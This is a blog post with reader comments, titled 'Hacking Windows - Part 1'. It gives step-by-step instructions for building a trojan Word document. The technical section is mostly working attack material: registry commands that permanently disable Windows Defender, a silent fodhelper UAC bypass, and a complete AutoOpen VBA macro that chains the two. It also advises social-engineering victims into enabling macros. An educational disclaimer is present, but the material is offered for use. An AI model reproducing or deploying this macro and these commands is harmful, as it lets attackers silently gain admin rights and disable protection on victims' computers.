Hacking Windows - Part 1 by georgontech

View this thread on steempeak.com
technology · @georgontech ·
$1.64
Hacking Windows - Part 1
In this article I'm going to cover the most common methods to compromise a Windows 10 system. Starting with social engineering, bypassing UAC and disabling antivirus systems this article will give you insights on how attackers could infect your computer. 

<i>This article is for educational purpose only. I am not responsible for any demage done to your own or other peoples computer.</i>

<center>
https://cdn.steemitimages.com/DQmcm2qZ3XA83smpykZD8ythBgWJUgUsiNoHRzvpjBNP3h2/coding_computer_hacker_hacking_html_programmer_programming_script-1366057.jpg
</center>

<h2>Social Engeneering</h2>

Most of the times one gets a virus is because he got social engineered. But what does that mean? Wikipedia says, 

<i>"Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information. This differs from social engineering within the social sciences, which does not contain the divulging of confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme."</i>

A very common way to get a virus to your computer is through word or pdf documets. These documents allow running small pieces of code in the background if it's enabled. By default Windows disables this functionality, but with a bit social engineering magic many people can be tricked to allow these so called "macros" to be executed. Keep that in mind until the end of this article...

<center>
https://cdn.steemitimages.com/DQmRqKqN6YjFduPcqT1RC9rksa6GDAYYZQyz5kJVcBS6GxA/Screenshot__20_-10ee2356e2c2bf31.png
<i>Example of malicious word document</i>
</center>


<h2>Turning off Windows Defender</h2>

Windows defender can be a really annoying piece of software, but nonetheless it helps to keep your computer clean. Of course, as an attacker we want to switch it off, so we can do all the "hard" stuff afterwards. This can be achieved via cmd by editing your registry. 

You can open your cmd as admin and type:

<blockquote>

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "00000001" /f & REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d "00000001" /f & REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d "00000001" /f & REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d "00000001" /f 

</blockquote>

This adds 4 registry entries which turn off your defender permanently! To turn it back on you need to remove those entries by typing:

<blockquote>

REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender"

</blockquote>

Of course being an attacker we have no access to a cmd console and even less to one with admin rights. So we're going to need something "hacky". A trick to gain elevated rights without the user noticing it...

<center>
https://cdn.steemitimages.com/DQmVy3T7UcTSMM5drQ9iMiSyKW6KjGdawUkeAvcM4AU228T/Unbenannt.JPG
<i>All switches are grayed out. You can not turn defender back on manually.</i>
</center>

<h2>Bypassing UAC in Windows</h2>
After having done a few "tricks" rather than real hacking here comes something most people would really consider "hacking". This section is about gaining admin privileges without having an ugly UAC prompt to the users. This process is completely silent and let's you do ANY admin task on a victim's computer. It will later help us switching off Windows Defender without an admin shell.

Basically we're just opening a standard windows tool called fodhelper.exe (every windows 10 computer has this). You can just click your windows symbol and enter fodhelper and there it is. 

When this little program starts it looks for a registry entry in:

<blockquote>

HKCU\Environment\windir

</blockquote>

Usually this entry is empty or non-existent - by adding (or modifying) it, we're able to trick fodhelper to run a specific command. And because fodhelper is a standard windows tool it has admin rights by default. So the only thing we need to do is adding the registry entry with a specific task we want to accomplish and fodhelper will run that command with elevated rights. Luckily this registry entry is for the current user only and we need NO ELEVATED RIGHTS to make this entry.

To edit the registry entry just type:

<blockquote>

REG ADD "HKCU\Environment" /v "windir" /d "cmd /c whatever console command you want to be executed with admin privileges"

</blockquote>

When you now start fodhelper as a regular user, the program will look for the value in "HKCU\Environment\windir" and execute our cmd command with admin privileges. 

By the way - In my opinion this is a really really big security issue in Windows 10. And it's a shame Microsoft hasn't done anything about it yet. The fact that this vulnerability is known at least since 2017 makes it even worse.



<h2>Finally...</h2>

Now we've got all tools an attacker needs to gain access to your computer and turn off all security mechanisms. We only need to pack it nicely inside a word document so nobody notices our trojan.

Let's open word and create a macro...


1 Open a new Word Document

2 In the toolbar go to View and click on Macros

3 Create a new macro with the name AutoOpen
<center>
https://cdn.steemitimages.com/DQmRVpiovqu3e2hqEvUJooi7hogcmE1AXzjRvC4mugTrWvM/Unben111111111annt.JPG
</center>

4 Insert the following code:

<blockquote>
Sub AutoOpen()

'Hijack Registry to turn off Windows Defender as soon as fodhelper.exe is started (on next startup)

Set wshShell = CreateObject("WScript.Shell")

'The following line modifies the regkey in a way that it is run as admin when opening fodhelper, which turns off defender

wshShell.RegWrite "HKCU\Environment\windir", "cmd /c REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v ""DisableAntiSpyware"" /t ""REG_DWORD"" /d ""00000001"" /f & REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v ""DisableBehaviorMonitoring"" /t ""REG_DWORD"" /d ""00000001"" /f & REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v ""DisableOnAccessProtection"" /t ""REG_DWORD"" /d ""00000001"" /f & REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v ""DisableScanOnRealtimeEnable"" /t ""REG_DWORD"" /d ""00000001"" /f "

Shell ("cmd /c fodhelper")
Set wshShell = Nothing

End Sub

</blockquote>

<center>
https://cdn.steemitimages.com/DQmQoE9Dv96C6RmLMEXDtqC4oYEs6AyWnEJtiHUywCapPxZ/Unb2222222222222enannt.JPG
</center>

5 Save the document with .docm ending (this is important to also save the macro)

(6) A real attacker would add an image like the one from section "Social Engineering" to trick users to allow macros

When you now open your file you'll usually see an orange bar which asks you if you want to enable macros for this document. This is an often underrated security feature in Windows although most people will just click enable content, especially if they were social engineered properly.

In case you click enable content, the code will be executed in background and shutting down your whole security system by using the UAC bypass and the registry entry for disabling your defender, without you even noticing it. 


<h2>Part 2</h2>

If you're interested in how an attacker would get malicious code like ransomware to your computer after disabling your security systems (and how this code would look like) , just vote up and follow me. The more people like this post the more likely I'm going to write more on this topic.
👍  , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
properties (23)
post_id68,373,509
authorgeorgontech
permlinkhacking-windows-part-1
categorytechnology
json_metadata{"image":["https:\/\/cdn.steemitimages.com\/DQmcm2qZ3XA83smpykZD8ythBgWJUgUsiNoHRzvpjBNP3h2\/coding_computer_hacker_hacking_html_programmer_programming_script-1366057.jpg"],"tags":["technology","hacking","trojan","security","windows"],"app":"steemit\/0.1","format":"markdown"}
created2019-01-05 00:30:27
last_update2019-01-05 00:30:27
depth0
children3
net_rshares3,038,111,137,653
last_payout2019-01-12 00:30:27
cashout_time1969-12-31 23:59:59
total_payout_value1.232 SBD
curator_payout_value0.406 SBD
pending_payout_value0.000 SBD
promoted0.000 SBD
body_length7,865
author_reputation2,435,940,447,292
root_title"Hacking Windows - Part 1"
beneficiaries[]
max_accepted_payout1,000,000.000 SBD
percent_steem_dollars10,000
author_curate_reward""
vote details (29)
@ubasti · 
mitnick said it, Q proved it with a 16 year old girl, the weakest link is humans ... local access and

and euhm ... i remember when telenet here was SO nice you could enter an i.p.-address in the search on start menu and if someone had a shared folder on their pc in windows you could just access it ... but that's been a while

i use windows for gaming only really, otherwise i simply stick to minimal linux systems (which doesnt mean its safe ... anyone with a keylogger who had local access could still do anything i suppose)

but i'm not a hacker and i dont wanna feed the trolls lol
properties (22)
post_id68,373,637
authorubasti
permlinkre-georgontech-hacking-windows-part-1-20190105t003345070z
categorytechnology
json_metadata{"tags":["technology"],"app":"steemit\/0.1"}
created2019-01-05 00:33:45
last_update2019-01-05 00:33:45
depth1
children0
net_rshares0
last_payout2019-01-12 00:33:45
cashout_time1969-12-31 23:59:59
total_payout_value0.000 SBD
curator_payout_value0.000 SBD
pending_payout_value0.000 SBD
promoted0.000 SBD
body_length587
author_reputation2,479,958,677,629
root_title"Hacking Windows - Part 1"
beneficiaries[]
max_accepted_payout1,000,000.000 SBD
percent_steem_dollars0
@promobot ·
re-georgontech-hacking-windows-part-1-20190105t092722255z
@georgontech purchased a 19.65% vote from @promobot on this post.

*If you disagree with the reward or content of this post you can purchase a reversal of this vote by using our curation interface http://promovotes.com
properties (22)
post_id68,388,149
authorpromobot
permlinkre-georgontech-hacking-windows-part-1-20190105t092722255z
categorytechnology
json_metadata{"app":"postpromoter\/2.0.0"}
created2019-01-05 09:27:27
last_update2019-01-05 09:27:27
depth1
children0
net_rshares0
last_payout2019-01-12 09:27:27
cashout_time1969-12-31 23:59:59
total_payout_value0.000 SBD
curator_payout_value0.000 SBD
pending_payout_value0.000 SBD
promoted0.000 SBD
body_length219
author_reputation9,027,251,779,484
root_title"Hacking Windows - Part 1"
beneficiaries[]
max_accepted_payout1,000,000.000 SBD
percent_steem_dollars10,000
@steemitboard · 
Congratulations @georgontech! You have completed the following achievement on the Steem blockchain and have been rewarded with new badge(s) :

<table><tr><td>https://steemitimages.com/60x60/http://steemitboard.com/notifications/firstpost.png</td><td>You published your First Post</td></tr>
<tr><td>https://steemitimages.com/60x60/http://steemitboard.com/notifications/firstvoted.png</td><td>You got a First Vote</td></tr>
</table>

<sub>_[Click here to view your Board](https://steemitboard.com/@georgontech)_</sub>
<sub>_If you no longer want to receive notifications, reply to this comment with the word_ `STOP`</sub>



> Support [SteemitBoard's project](https://steemit.com/@steemitboard)! **[Vote for its witness](https://v2.steemconnect.com/sign/account-witness-vote?witness=steemitboard&approve=1)** and **get one more award**!
properties (22)
post_id68,391,846
authorsteemitboard
permlinksteemitboard-notify-georgontech-20190105t113132000z
categorytechnology
json_metadata{"image":["https:\/\/steemitboard.com\/img\/notify.png"]}
created2019-01-05 11:31:30
last_update2019-01-05 11:31:30
depth1
children0
net_rshares0
last_payout2019-01-12 11:31:30
cashout_time1969-12-31 23:59:59
total_payout_value0.000 SBD
curator_payout_value0.000 SBD
pending_payout_value0.000 SBD
promoted0.000 SBD
body_length834
author_reputation38,705,954,145,809
root_title"Hacking Windows - Part 1"
beneficiaries[]
max_accepted_payout1,000,000.000 SBD
percent_steem_dollars10,000
Help/Feedback